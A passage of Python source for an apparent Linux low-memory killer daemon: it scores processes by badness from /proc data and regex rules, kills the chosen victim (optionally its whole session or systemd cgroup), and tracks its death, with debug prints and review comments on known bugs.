        # kill the session only if the leader name matches a configured regex
        for sid_name_re in kill_session_regex_sid_name_list:
            if search(sid_name_re, victim_sid_name) is not None:
                kill_session = True
                vwd = True
                killed_session_counter = 1
                log(" Regular expression '{}' matches with session leader name '{}'".format(
                    sid_name_re, victim_sid_name))
                break
        uu1 = monotonic()
        if kill_session:
            log(" Killing victim's session (SID: {}, session leader: {}, autogroup: {})".format(
                victim_sid, victim_sid_name, victim_autogroup))
            if victim_sid != victim_pid:
                try:
                    if victim_sid not in killed_set:
                        os.kill(int(victim_sid), SIGKILL)
                        killed_set.add(victim_sid)
                        killed_session_counter += 1
                        log(' Killing process {} ({})'.format(victim_sid, victim_sid_name))
                except FileNotFoundError:
                    log(' FileNotFoundError')
                except ProcessLookupError:
                    log(' ProcessLookupError')
            pid_list = alive_pid_list()
            # pid_set = set(pid_list)
            for pid in pid_list:
                if pid in killed_set:
                    continue
                au = pid_to_autogroup(pid)
                if au == victim_autogroup:
                    try:
                        if pid not in killed_set:
                            os.kill(int(pid), SIGKILL)
                            killed_set.add(pid)
                            killed_session_counter += 1
                            log(' Killing process {} ({})'.format(pid, pid_to_name(pid)))
                    except FileNotFoundError:
                        log(' FileNotFoundError')
                    except ProcessLookupError:
                        log(' ProcessLookupError')
            autogroup_was_killed = True
        if kill_session:
            print(" {} processes were killed in this session".format(
                killed_session_counter))
        uu2 = monotonic()
        print(uu2 - uu1)
        print('Killed tasks:', killed_set)
    #################################################################
    """
    if kill_cgroup_unified_enabled:
        pass
    """
    #################################################################
    # optional custom action: kill the victim's whole systemd cgroup
    if custom_action_re_cgroup_systemd:
        print('GROUP:SYSTEMD')
        kill_group_systemd = False
        for rega, kill_group, _ in custom_action_re_cgroup_systemd_list:
            print(rega, kill_group)
            print(rega, cgroup_systemd)
            if search(rega, cgroup_systemd) is not None and kill_group:
                kill_group_systemd = True
                break
        print('Будет убита?', kill_group_systemd)
        if kill_group_systemd:
            log(" Killing victim's systemd cgroup '{}'".format(
                cgroup_systemd))
            cg_proc_list = cgroup_systemd_to_proc_list(cgroup_systemd)
            killed_cg_counter = 1
            for pid in cg_proc_list:
                if pid == victim_pid:
                    continue
                try:
                    os.kill(int(pid), SIGKILL)
                    killed_cg_counter += 1
                    log(' Killing process {} ({})'.format(
                        pid, pid_to_name(pid)))
                except FileNotFoundError:
                    log(' FileNotFoundError')
                except ProcessLookupError:
                    # NOTE(review): message says FileNotFoundError but this
                    # branch handles ProcessLookupError — likely a copy-paste
                    log(' FileNotFoundError')
            print(killed_cg_counter)
    #cg_proc_list = cgroup_systemd_to_proc_list(cgroup_systemd)
    # print(cg_proc_list)
    # sleep(5)
    #cg_proc_list = cgroup_systemd_to_proc_list(cgroup_systemd)
    # print(cg_proc_list)
    #################################################################
    # victim tracking: remember victims that are expected to survive
    if not vwd:
        if victim_id not in v_dict:
            v_dict[victim_id] = dict()
            v_dict[victim_id]['time'] = monotonic()
            v_dict[victim_id]['name'] = victim_name
        else:
            pass
    last_action_dict['t'] = kill_timestamp = monotonic()
    # print(v_dict)
    # response_time = monotonic() - time0
    # log('success: ' + str(success))
    # log('victim will die: ' + str(vwd))
    # log('response_time: ' + str(response_time) + ' sec')
    # START OF VICTIM STATE TRACKING. Could be moved into a separate
    # function: takes the id, logs, returns something.
    # Then rework the dicts: victim died here — reset the timer; if all old
    # victims die within 3 seconds in the following cycles — reset the timer.
    # After that everything should work well.
    # ??? - This was done for PSI. Re-test: is PSI broken now?
    kill_timestamp = ttt0
    # poll the victim: 'X' = gone, 'E' = exiting, 'R' = running, else zombie
    while True:
        sleep(0.01)
        iva = is_victim_alive(victim_id)
        d = monotonic() - kill_timestamp
        if iva == 'X':
            if victim_id in v_dict:
                v_dict.pop(victim_id)
            a = d
            break
        elif iva == 'E':
            b = d
            if not vwd and d > sensitivity_test_time:
                break
        elif iva == 'R':
            c = d
            pass
        else:
            if victim_id in v_dict:
                v_dict.pop(victim_id)
            e = d
            sleep(post_zombie_delay)
            break
    ttt5 = monotonic()
    # debug output of whichever timing variables got assigned above
    try:
        print(a)
    except Exception:
        pass
    #print('a ---')
    try:
        print(b)
    except Exception:
        pass
    #print('b ---')
    try:
        print(c)
    except Exception:
        pass
    #print('c ---')
    try:
        print(e)
    except Exception:
        pass
    #print('e ---')
    print('ttt5', ttt5 - kill_timestamp)
    mem_available, swap_total, swap_free = check_mem_and_swap()
    ma_mib = int(mem_available) / 1024.0
    sf_mib = int(swap_free) / 1024.0
    log('Memory status after implementing a corrective act'
        'ion:\n MemAvailable'
        ': {} MiB, SwapFree: {} MiB'.format(
            round(ma_mib, 1), round(sf_mib, 1)))
    soft_match = False # fix this kludge
    if soft_match is False:
        key = ' Send {} to {}'.format(sig_dict[threshold], victim_name)
        update_stat_dict_and_print(key)
    else:
        # NOTE(review): unreachable while soft_match is hard-coded False;
        # 'command' is also undefined in this scope
        key = " Run the command '{}'".format(command)
        update_stat_dict_and_print(key)
    #################################################################
    # command execution goes here
    if post_action_gui_notifications:
        if soft_match:
            send_notify_etc(pid, victim_name, cmd)
        else:
            if autogroup_was_killed:
                send_notify(SIGKILL, victim_name + '\n and its autogroup', victim_pid)
            else:
                send_notify(threshold, victim_name, victim_pid)
def implement_corrective_action(
        threshold,
        mem_info_list,
        hard_threshold_psi_exceeded_timer,
        soft_threshold_psi_exceeded_timer,
        psi_timestamp0,
        psi_threshold,
        zram_threshold,
        zram_info,
        psi_info):
    """Coordinate one corrective action cycle.

    Purges dead victims from v_dict, reuses a recently-hit cached victim or
    finds a new one, re-checks all memory thresholds, then delegates the
    actual kill to real_implement_corrective_action() if the victim's
    badness is high enough.
    """
    log('>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>')
    time0 = monotonic()
    debug_corrective_action = True
    for i in mem_info_list:
        log(i) # log the exceeded thresholds
    # 3
    # 1. Purge the dict of dead victims; iterate the dict tracking the dying.
    # 2. Iterate over the remaining dict looking for deltas. If at least one
    #    delta has NOT expired — WAIT, leave the function.
    print('Словарь живых на входе', v_dict)
    deadlist = [] # holds victim_id values of dead victims
    for victim_id in v_dict: # look for victims that survived earlier actions
        iva = is_victim_alive(victim_id)
        print(iva, victim_id)
        if iva == 'X' or iva == 'Z':
            deadlist.append(victim_id) # collect the list of the dead
    """
            continue
        if iva == 'E':
            continue
        if iva == 'R':
            pass # быстро отследить умирающего
    """
    for i in deadlist:
        if debug_corrective_action:
            log('Remove {} from v_dict'.format(i))
        # iterate over the dead list and drop them from the dict of
        # live victims
        v_dict.pop(i)
    print('Словарь жив жертв после удал мертвых', v_dict)
    use_cached_victim = False # whether to hit the cached victim again
    cached_victims_list = []
    # cached_victims_list.append(('foo', 0.01))
    # cached_victims_list.append(('boo', 1111.01))
    # 2
    # print(v_dict)
    for victim_id in v_dict: # iterate over live, not-yet-dead victims
        tx = v_dict[victim_id]['time'] # time of the previous action
        ddt = monotonic() - tx # time elapsed since the previous action
        if ddt < victim_cache_time: # if the victim cache time has not expired
            if debug_corrective_action:
                log('victim_cache_time is not exceeded for {} (тут подробнее расшифровать айди) ({} < {}), будем добивать старую живую кэшированную недобитую жертву'.format(
                    victim_id, round(ddt, 3), victim_cache_time))
            use_cached_victim = True # really use the cached victim
            # collect the survivors together with the elapsed time, so the
            # most recent victim can be picked
            cached_victims_list.append((victim_id, ddt))
            break
    if use_cached_victim:
        print(cached_victims_list)
        sorted_cached_victims_list = sorted(
            cached_victims_list,
            key=itemgetter(1),
            reverse=False) # pick the most recent victim
        # victim id found
        cached_victim_id = sorted_cached_victims_list[0][0]
    if use_cached_victim:
        victim_id = cached_victim_id
        pid = victim_id.partition('_pid')[2]
        victim_badness = pid_to_badness(pid)[0]
        name = v_dict[victim_id]['name']
        log('New victim is cached victim {} ({})'.format(pid, name))
    else:
        pid, victim_badness, name, victim_id = find_victim(
            print_proc_table) # search for a new victim if none is cached
    # 3
    # RECHECK memory levels; refine the threshold after finding the victim
    log('Recheck memory levels...')
    (masf_threshold, masf_info, mem_available, hard_threshold_min_swap_kb,
     soft_threshold_min_swap_kb, swap_free, swap_total
     ) = check_mem_swap_exceeded()
    if CHECK_ZRAM:
        zram_threshold, zram_info, mem_used_zram = check_zram_exceeded()
    if CHECK_PSI:
        (psi_threshold,
         psi_info,
         hard_threshold_psi_exceeded_timer,
         soft_threshold_psi_exceeded_timer,
         psi_timestamp0) = check_psi_exceeded(hard_threshold_psi_exceeded_timer,
                                              soft_threshold_psi_exceeded_timer,
                                              psi_timestamp0)
    # the strictest exceeded threshold wins: SIGKILL over SIGTERM
    if (masf_threshold is SIGKILL or zram_threshold is SIGKILL or
            psi_threshold is SIGKILL):
        new_threshold = SIGKILL
        mem_info_list = []
        if masf_threshold is SIGKILL or masf_threshold is SIGTERM:
            mem_info_list.append(masf_info)
        if zram_threshold is SIGKILL or zram_threshold is SIGTERM:
            mem_info_list.append(zram_info)
        if psi_threshold is SIGKILL or psi_threshold is SIGTERM:
            mem_info_list.append(psi_info)
    elif (masf_threshold is SIGTERM or zram_threshold is SIGTERM or
            psi_threshold is SIGTERM):
        new_threshold = SIGTERM
        mem_info_list = []
        if masf_threshold is SIGKILL or masf_threshold is SIGTERM:
            mem_info_list.append(masf_info)
        if zram_threshold is SIGKILL or zram_threshold is SIGTERM:
            mem_info_list.append(zram_info)
        if psi_threshold is SIGKILL or psi_threshold is SIGTERM:
            mem_info_list.append(psi_info)
    else:
        log('Thresholds is not exceeded now')
        return None
    for i in mem_info_list:
        log(i)
    # NOTE(review): new_threshold can only be SIGKILL/SIGTERM here,
    # so this check is dead code
    if new_threshold is None or new_threshold == 'WARN':
        log('Thresholds is not exceeded now')
        return None
    threshold = new_threshold
    # 3
    # CORRECTION
    vwd = None # Victim Will Die
    if victim_badness >= min_badness:
        if threshold is SIGTERM:
            if victim_id in v_dict:
                # escalate to SIGKILL if the victim ignored SIGTERM too long
                dt = monotonic() - v_dict[victim_id]['time']
                if dt > max_soft_exit_time:
                    log('max_soft_exit_time is exceeded: the '
                        'victim will get SIGKILL')
                    threshold = SIGKILL
                else:
                    log('max_soft_exit_time is not exceeded ('
                        '{} < {}) for the victim'.format(round(
                            dt, 1), max_soft_exit_time))
                    if debug_sleep:
                        log('Sleep {} sec (over_sleep)'.format(over_sleep))
                    sleep(over_sleep)
                    log('<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<')
                    return None
        if print_victim_status:
            # re-check victim badness; do not rely on the old value
            victim_info = find_victim_info(pid, victim_badness, name)
            log(victim_info)
        #log('Try to implement a corrective action...')
        # the action itself comes next
        real_implement_corrective_action(
            pid, threshold, time0, vwd, victim_id, name)
    else:
        response_time = monotonic() - time0
        victim_badness_is_too_small = 'victim badness ({}) < min_b' \
            'adness ({}); nothing to do; response time: {} ms'.format(
                victim_badness,
                min_badness,
                round(response_time * 1000))
        log(victim_badness_is_too_small)
        # update stat_dict
        key = 'victim badness < min_badness'
        update_stat_dict_and_print(key)
    if vwd is None:
        if debug_sleep:
            log('Sleep {} sec (over_sleep)'.format(over_sleep))
        sleep(over_sleep)
    print(v_dict)
    log('<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<')
###########################################################################################################################
###########################################################################################################################
# 5 Process state
def pid_to_autogroup(pid):
    """Return the autogroup id from /proc/[pid]/autogroup, or None if unavailable."""
    try:
        line = rline1('/proc/{}/autogroup'.format(pid))
    except (IndexError, FileNotFoundError, ProcessLookupError):
        return None
    return line.partition('/autogroup-')[2].partition(' nice ')[0]
def pid_to_loginuid(pid):
    """Return the first line of /proc/[pid]/loginuid, or None if unavailable."""
    try:
        return rline1('/proc/{}/loginuid'.format(pid))
    except (IndexError, FileNotFoundError, ProcessLookupError):
        return None
def pid_to_cgroup_systemd(pid):
    """Return the systemd (v1) cgroup path of *pid*, read from the
    line number cgroup_systemd_index of /proc/<pid>/cgroup; '' if the
    process died or the line was not found."""
    result = ''
    try:
        with open('/proc/' + pid + '/cgroup') as f:
            for n, line in enumerate(f):
                if n == cgroup_systemd_index:
                    # drop the 'N:name=systemd:' prefix and trailing \n
                    result = '/' + line.partition('/')[2][:-1]
        return result
    except (FileNotFoundError, ProcessLookupError):
        return ''
def pid_to_cgroup_unified(pid):
    """Return the unified (v2) cgroup path of *pid*, read from the
    line number cgroup_unified_index of /proc/<pid>/cgroup; '' if the
    process died or the line was not found."""
    result = ''
    try:
        with open('/proc/' + pid + '/cgroup') as f:
            for n, line in enumerate(f):
                if n == cgroup_unified_index:
                    # strip the leading '0::' and the trailing newline
                    result = line[3:-1]
        return result
    except (FileNotFoundError, ProcessLookupError):
        return ''
def uptime():
    """Return seconds since boot as a float (first field of
    /proc/uptime)."""
    first_field = rline1('/proc/uptime').partition(' ')[0]
    return float(first_field)
def pid_to_starttime(pid):
    """Return the process start time in seconds since boot (float).

    Uses field 22 of /proc/<pid>/stat (index 20 after splitting the
    text that follows the ')' closing the comm field), divided by the
    clock tick rate SC_CLK_TCK.

    NOTE(review): on FileNotFoundError/ProcessLookupError this returns
    '' (a string) while the normal path returns a float; callers doing
    arithmetic on the result would raise TypeError — confirm callers
    handle the '' case.
    """
    try:
        starttime = rline1('/proc/' + pid + '/stat').rpartition(')')[
            2].split(' ')[20]
    except FileNotFoundError:
        return ''
    except ProcessLookupError:
        return ''
    except UnicodeDecodeError:
        # the comm field may contain non-UTF-8 bytes: lossy re-decode
        with open('/proc/' + pid + '/stat', 'rb') as f:
            starttime = f.read().decode('utf-8', 'ignore').rpartition(
                ')')[2].split(' ')[20]
    return float(starttime) / SC_CLK_TCK
def pid_to_sid(pid):
    """Return the session ID of *pid* as a string (field 6 of
    /proc/<pid>/stat, index 4 after the ')' ending the comm field),
    or '' if the process no longer exists."""
    try:
        sid = rline1('/proc/' + pid + '/stat').rpartition(')')[
            2].split(' ')[4]
    except UnicodeDecodeError:
        # the comm field may contain non-UTF-8 bytes: lossy re-decode
        with open('/proc/' + pid + '/stat', 'rb') as f:
            sid = f.read().decode('utf-8', 'ignore').rpartition(
                ')')[2].split(' ')[4]
    except FileNotFoundError:
        return ''
    except ProcessLookupError:
        return ''
    return sid
def pid_to_state(pid):
    """Return the one-letter process state ('R', 'S', 'Z', ...) from
    /proc/<pid>/stat, or '' if the process no longer exists."""
    path = '/proc/' + pid + '/stat'
    try:
        with open(path, 'rb') as f:
            head = f.read(40)
        return head.decode('utf-8', 'ignore').rpartition(')')[2][1]
    except (FileNotFoundError, ProcessLookupError):
        return ''
    except IndexError:
        # a long comm field can push the state byte past the first 40
        # bytes: re-read the whole file
        with open(path, 'rb') as f:
            return f.read().decode('utf-8', 'ignore').rpartition(')')[2][1]
def pid_to_name(pid):
    """Return the comm name of *pid* (content of /proc/<pid>/comm
    without the trailing newline), or '' if the process is gone."""
    try:
        with open('/proc/' + pid + '/comm', 'rb') as f:
            raw = f.read()
    except (FileNotFoundError, ProcessLookupError):
        return ''
    return raw.decode('utf-8', 'ignore')[:-1]
def pid_to_ppid(pid):
    """Return the parent PID of *pid* as a string, '' if the process
    is gone.

    Parses the PPid: line of /proc/<pid>/status.  (Original author's
    note, translated: "get this from stat instead!")
    """
    try:
        with open('/proc/' + pid + '/status') as f:
            for n, line in enumerate(f):
                # FIX: compare with '==', not 'is' — identity of ints
                # is a CPython small-int caching artifact
                if n == ppid_index:
                    return line.split('\t')[1].strip()
    except FileNotFoundError:
        return ''
    except ProcessLookupError:
        return ''
    except UnicodeDecodeError:
        # status contained undecodable bytes: lossy re-decode
        with open('/proc/' + pid + '/status', 'rb') as f:
            f_list = f.read().decode('utf-8', 'ignore').split('\n')
        for i, line in enumerate(f_list):
            if i == ppid_index:
                # FIX: .strip() added for consistency with the fast path
                return line.split('\t')[1].strip()
def pid_to_ancestry(pid, max_victim_ancestry_depth=1):
    """Describe the victim's ancestors as a one-line string.

    Depth 0 -> ''; depth 1 -> ' PPID: <ppid> (<name>)'; deeper ->
    ' Ancestry: PID a (x) <= PID b (y) ...' up to the given depth or
    until PID 1 is reached.
    """
    if max_victim_ancestry_depth == 0:
        return ''
    if max_victim_ancestry_depth == 1:
        parent = pid_to_ppid(pid)
        return ' PPID: {} ({})'.format(parent, pid_to_name(parent))
    chain = []
    current = pid
    for _ in range(max_victim_ancestry_depth):
        parent = pid_to_ppid(current)
        chain.append((parent, pid_to_name(parent)))
        if parent == '1':
            break
        current = parent
    joined = ''.join(' <= PID {} ({})'.format(p, n) for p, n in chain)
    # drop the leading ' <= ' of the first element
    return ' Ancestry: ' + joined[4:]
def pid_to_cmdline(pid):
    """Return the command line of *pid* with NUL separators replaced
    by spaces (trailing whitespace stripped), or '' if the process no
    longer exists."""
    try:
        with open('/proc/' + pid + '/cmdline') as f:
            raw = f.read()
    except (FileNotFoundError, ProcessLookupError):
        return ''
    return raw.replace('\x00', ' ').rstrip()
def pid_to_environ(pid):
    """Return the environment of *pid* with NUL separators replaced
    by spaces (trailing whitespace stripped), or '' if the process no
    longer exists."""
    try:
        with open('/proc/' + pid + '/environ') as f:
            raw = f.read()
    except (FileNotFoundError, ProcessLookupError):
        return ''
    return raw.replace('\x00', ' ').rstrip()
def pid_to_realpath(pid):
    """Resolve /proc/<pid>/exe to the executable's real path.

    Returns '' when the lookup raises.  NOTE(review): os.path.realpath
    normally swallows resolution errors and returns the input path
    unchanged instead of raising, so for a dead pid this likely
    returns the literal '/proc/<pid>/exe' rather than '' — confirm
    against callers.
    """
    try:
        return os.path.realpath('/proc/' + pid + '/exe')
    except FileNotFoundError:
        return ''
    except ProcessLookupError:
        return ''
def pid_to_cwd(pid):
    """Resolve /proc/<pid>/cwd to the process working directory.

    Returns '' when the lookup raises.  NOTE(review): as with
    pid_to_realpath, os.path.realpath usually does not raise for a
    missing path — the except clauses may be dead; confirm.
    """
    try:
        return os.path.realpath('/proc/' + pid + '/cwd')
    except FileNotFoundError:
        return ''
    except ProcessLookupError:
        return ''
def pid_to_uid(pid):
    """Return the effective UID of *pid* as a string ('' if it died).

    Parses the Uid: line of /proc/<pid>/status; field [2] of the
    tab-split line is the effective UID.
    """
    try:
        with open('/proc/' + pid + '/status') as f:
            for n, line in enumerate(f):
                # FIX: '==', not 'is' — int identity is a CPython
                # small-int caching artifact
                if n == uid_index:
                    return line.split('\t')[2]
    except UnicodeDecodeError:
        # status contained undecodable bytes: lossy re-decode
        with open('/proc/' + pid + '/status', 'rb') as f:
            f_list = f.read().decode('utf-8', 'ignore').split('\n')
        return f_list[uid_index].split('\t')[2]
    except FileNotFoundError:
        return ''
    except ProcessLookupError:
        return ''
def pid_to_status(pid):
    """Parse /proc/<pid>/status and return the tuple
    (name, state, ppid, uid, vm_size, vm_rss, vm_swap) with the memory
    values converted from KiB to MiB.

    Returns None if the process disappeared or a field could not be
    parsed; falls back to pid_to_status_unicode() on undecodable bytes.
    """
    try:
        with open('/proc/' + pid + '/status') as f:
            for n, line in enumerate(f):
                # FIX throughout: '==' instead of 'is' — identity
                # comparison of ints relies on CPython int caching
                if n == 0:
                    name = line.split('\t')[1][:-1]
                if n == state_index:
                    state = line.split('\t')[1][0]
                    continue
                if n == ppid_index:
                    ppid = line.split('\t')[1][:-1]
                    continue
                if n == uid_index:
                    uid = line.split('\t')[2]
                    continue
                if n == vm_size_index:
                    vm_size = kib_to_mib(int(line.split('\t')[1][:-4]))
                    continue
                if n == vm_rss_index:
                    vm_rss = kib_to_mib(int(line.split('\t')[1][:-4]))
                    continue
                if n == vm_swap_index:
                    vm_swap = kib_to_mib(int(line.split('\t')[1][:-4]))
                    break
        return name, state, ppid, uid, vm_size, vm_rss, vm_swap
    except UnicodeDecodeError:
        # status contained raw bytes: retry with a lossy decode
        return pid_to_status_unicode(pid)
    except FileNotFoundError:
        return None
    except ProcessLookupError:
        return None
    except ValueError:
        return None
def pid_to_status_unicode(pid):
    """Fallback for pid_to_status(): lossily decode /proc/<pid>/status
    when it contains non-UTF-8 bytes, returning the same tuple
    (name, state, ppid, uid, vm_size, vm_rss, vm_swap) or None."""
    try:
        with open('/proc/' + pid + '/status', 'rb') as f:
            f_list = f.read().decode('utf-8', 'ignore').split('\n')
        # FIX: '==' instead of 'is' for all int comparisons; enumerate
        # instead of range(len(...))
        for i, line in enumerate(f_list):
            if i == 0:
                name = line.split('\t')[1]
            if i == state_index:
                state = line.split('\t')[1][0]
            if i == ppid_index:
                ppid = line.split('\t')[1]
            if i == uid_index:
                uid = line.split('\t')[2]
            if i == vm_size_index:
                # [:-3] (not [:-4]): '\n'.split already removed the
                # newline, leaving only the ' kB' suffix
                vm_size = kib_to_mib(int(line.split('\t')[1][:-3]))
            if i == vm_rss_index:
                vm_rss = kib_to_mib(int(line.split('\t')[1][:-3]))
            if i == vm_swap_index:
                vm_swap = kib_to_mib(int(line.split('\t')[1][:-3]))
        return name, state, ppid, uid, vm_size, vm_rss, vm_swap
    except FileNotFoundError:
        return None
    except ProcessLookupError:
        return None
    except ValueError:
        return None
def pid_to_badness(pid):
    """Return (badness, oom_score) for *pid*, or (None, None) if the
    process disappeared.

    Starts from the kernel's oom_score, optionally subtracts a
    positive oom_score_adj, then adds every matching
    @BADNESS_ADJ_RE_* rule (name, cgroups, realpath, cwd, cmdline,
    environ, uid).  The result is clamped at >= 0.
    """
    try:
        oom_score = int(rline1('/proc/' + pid + '/oom_score'))
        badness = oom_score
        # leftover author note below (bare string, translated: "New:
        # forbid raising badness if ...")
        """
        Новое:
        запрет на повышение бэднес если
        """
        if ignore_positive_oom_score_adj:
            # do not let a positive oom_score_adj inflate badness
            oom_score_adj = int(rline1('/proc/' + pid + '/oom_score_adj'))
            if oom_score_adj > 0:
                badness = badness - oom_score_adj
        # each *_list holds (adjustment, regex) tuples from the config
        if regex_matching:
            name = pid_to_name(pid)
            for re_tup in badness_adj_re_name_list:
                if search(re_tup[1], name) is not None:
                    badness += int(re_tup[0])
        if re_match_cgroup_systemd:
            cgroup_systemd = pid_to_cgroup_systemd(pid)
            for re_tup in badness_adj_re_cgroup_systemd_list:
                if search(re_tup[1], cgroup_systemd) is not None:
                    badness += int(re_tup[0])
        if re_match_cgroup_unified:
            cgroup_unified = pid_to_cgroup_unified(pid)
            for re_tup in badness_adj_re_cgroup_unified_list:
                if search(re_tup[1], cgroup_unified) is not None:
                    badness += int(re_tup[0])
        if re_match_realpath:
            realpath = pid_to_realpath(pid)
            for re_tup in badness_adj_re_realpath_list:
                if search(re_tup[1], realpath) is not None:
                    badness += int(re_tup[0])
        if re_match_cwd:
            cwd = pid_to_cwd(pid)
            for re_tup in badness_adj_re_cwd_list:
                if search(re_tup[1], cwd) is not None:
                    badness += int(re_tup[0])
        if re_match_cmdline:
            cmdline = pid_to_cmdline(pid)
            for re_tup in badness_adj_re_cmdline_list:
                if search(re_tup[1], cmdline) is not None:
                    badness += int(re_tup[0])
        if re_match_environ:
            environ = pid_to_environ(pid)
            for re_tup in badness_adj_re_environ_list:
                if search(re_tup[1], environ) is not None:
                    badness += int(re_tup[0])
        if re_match_uid:
            uid = pid_to_uid(pid)
            for re_tup in badness_adj_re_uid_list:
                if search(re_tup[1], uid) is not None:
                    badness += int(re_tup[0])
        # badness is never negative
        if badness < 0:
            badness = 0
        return badness, oom_score
    except FileNotFoundError:
        return None, None
    except ProcessLookupError:
        return None, None
def get_victim_id(pid):
    """Return 'starttime:pid' — the pid qualified by the process start
    time, stable across pid reuse; '' if the process is gone."""
    try:
        stat_tail = rline1('/proc/' + pid + '/stat').rpartition(')')[2]
        return stat_tail.split(' ')[20] + ':' + pid
    except (FileNotFoundError, ProcessLookupError):
        return ''
def is_victim_alive(victim_id):
    """Check whether a victim is still alive / still releasing memory.

    We do not have a reliable sign of the end of the release of memory:
    https://github.com/rfjakob/earlyoom/issues/128#issuecomment-507023717

    Return values (translated from the original notes):
      'X'  dead, nonexistent, or pid reused by another process
           (action fully implemented; the POST SIGKILL DELAY may be
           skipped)
      'E'  /proc/<pid>/exe still resolves -> process really alive
      'R'  running: still releasing memory, keep waiting for death
      'Z'  zombie: memory probably already released, stop tracking
    """
    # victim integrity check: starttime+pid must still match
    starttime, pid = victim_id.split(':')
    new_victim_id = get_victim_id(pid)
    if victim_id != new_victim_id:
        return 'X'
    # is the victim alive?
    exe_exists = os.path.exists('/proc/{}/exe'.format(pid))
    if exe_exists:
        return 'E'
    # from here the victim is mortally wounded; differentiate by State:
    # R -> keep tracking the victim
    # X, FileNotFoundError, ProcessLookupError -> done
    state = pid_to_state(pid)
    if state == 'R':
        return 'R'
    if state == 'Z':
        return 'Z'
    if state == 'X' or state == '':
        return 'X'
    return 'X'
def is_unkillable(pid):
    """Return True if *pid* has oom_score_adj == -1000 (the kernel
    never OOM-kills it) or if it vanished while we were looking."""
    try:
        return rline1('/proc/{}/oom_score_adj'.format(pid)) == '-1000'
    except (FileNotFoundError, ProcessLookupError):
        return True
def find_victim_info(pid, victim_badness, name):
    """Collect and format a multi-line status report on the chosen
    victim: state, EUID, badness/oom_score/oom_score_adj,
    VmSize/VmRSS/VmSwap (MiB), cgroups, session, realpath, cwd,
    ancestry and lifetime.

    Returns the formatted string, or None if the victim died while the
    information was being gathered.

    NOTE(review): the `n is state_index`-style comparisons compare
    ints by identity (works on CPython small ints, should be '==');
    the trailing FileNotFoundError/ProcessLookupError clauses
    duplicate earlier ones and are unreachable dead code.
    """
    status0 = monotonic()  # to report how long the lookup took
    try:
        with open('/proc/' + pid + '/status') as f:
            for n, line in enumerate(f):
                if n is state_index:
                    state = line.split('\t')[1].rstrip()
                    continue
                """
                if n is ppid_index:
                    # ppid = line.split('\t')[1]
                    continue
                """
                if n is uid_index:
                    uid = line.split('\t')[2]
                    continue
                if n is vm_size_index:
                    vm_size = kib_to_mib(int(line.split('\t')[1][:-4]))
                    continue
                if n is vm_rss_index:
                    vm_rss = kib_to_mib(int(line.split('\t')[1][:-4]))
                    continue
                if detailed_rss:
                    # RssAnon/RssFile/RssShmem exist only on Linux 4.5+
                    if n is anon_index:
                        anon_rss = kib_to_mib(
                            int(line.split('\t')[1][:-4]))
                        continue
                    if n is file_index:
                        file_rss = kib_to_mib(
                            int(line.split('\t')[1][:-4]))
                        continue
                    if n is shmem_index:
                        shmem_rss = kib_to_mib(
                            int(line.split('\t')[1][:-4]))
                        continue
                if n is vm_swap_index:
                    vm_swap = kib_to_mib(int(line.split('\t')[1][:-4]))
                    break
        if print_victim_cmdline:
            cmdline = pid_to_cmdline(pid)
        oom_score = rline1('/proc/' + pid + '/oom_score')
        oom_score_adj = rline1('/proc/' + pid + '/oom_score_adj')
    except FileNotFoundError:
        log('The victim died in the search process: FileNotFoundError')
        update_stat_dict_and_print(
            'The victim died in the search process: FileNotFoundError')
        return None
    except ProcessLookupError:
        log('The victim died in the search process: ProcessLookupError')
        update_stat_dict_and_print(
            'The victim died in the search process: ProcessLookupError')
        return None
    except UnicodeDecodeError:
        # status contained undecodable bytes: lossy re-decode and redo
        # the same field extraction
        with open('/proc/' + pid + '/status', 'rb') as f:
            f_list = f.read().decode('utf-8', 'ignore').split('\n')
            for i in range(len(f_list)):
                if i is state_index:
                    state = f_list[i].split('\t')[1].rstrip()
                """
                if i is ppid_index:
                    pass
                    # ppid = f_list[i].split('\t')[1]
                """
                if i is uid_index:
                    uid = f_list[i].split('\t')[2]
                if i is vm_size_index:
                    vm_size = kib_to_mib(
                        int(f_list[i].split('\t')[1][:-3]))
                if i is vm_rss_index:
                    vm_rss = kib_to_mib(int(f_list[i].split('\t')[1][:-3]))
                if detailed_rss:
                    if i is anon_index:
                        anon_rss = kib_to_mib(
                            int(f_list[i].split('\t')[1][:-3]))
                    if i is file_index:
                        file_rss = kib_to_mib(
                            int(f_list[i].split('\t')[1][:-3]))
                    if i is shmem_index:
                        shmem_rss = kib_to_mib(
                            int(f_list[i].split('\t')[1][:-3]))
                if i is vm_swap_index:
                    vm_swap = kib_to_mib(
                        int(f_list[i].split('\t')[1][:-3]))
        if print_victim_cmdline:
            cmdline = pid_to_cmdline(pid)
        oom_score = rline1('/proc/' + pid + '/oom_score')
        oom_score_adj = rline1('/proc/' + pid + '/oom_score_adj')
    except IndexError:
        log('The victim died in the search process: IndexError')
        update_stat_dict_and_print(
            'The victim died in the search process: IndexError')
        return None
    except ValueError:
        log('The victim died in the search process: ValueError')
        update_stat_dict_and_print(
            'The victim died in the search process: ValueError')
        return None
    # NOTE(review): the two clauses below duplicate the clauses above
    # and can never be reached
    except FileNotFoundError:
        log('The victim died in the search process: FileNotFoundError')
        update_stat_dict_and_print(
            'The victim died in the search process: FileNotFoundError')
        return None
    except ProcessLookupError:
        log('The victim died in the search process: ProcessLookupError')
        update_stat_dict_and_print(
            'The victim died in the search process: ProcessLookupError')
        return None
    # width used to right-align VmRSS/VmSwap under VmSize
    len_vm = len(str(vm_size))
    try:
        realpath = os.path.realpath('/proc/' + pid + '/exe')
        cwd = os.path.realpath('/proc/' + pid + '/cwd')
        sid = pid_to_sid(pid)
        victim_lifetime = format_time(uptime() - pid_to_starttime(pid))
        victim_cgroup_systemd = pid_to_cgroup_systemd(pid)
        victim_cgroup_unified = pid_to_cgroup_unified(pid)
    except FileNotFoundError:
        log('The victim died in the search process: FileNotFoundError')
        update_stat_dict_and_print(
            'The victim died in the search process: FileNotFoundError')
        return None
    ancestry = pid_to_ancestry(pid, max_victim_ancestry_depth)
    if print_victim_cmdline is False:
        cmdline = ''
        c1 = ''
    else:
        c1 = '\n Cmdline: '
    if detailed_rss:
        detailed_rss_info = ' (' \
            'Anon: {} MiB, ' \
            'File: {} MiB, ' \
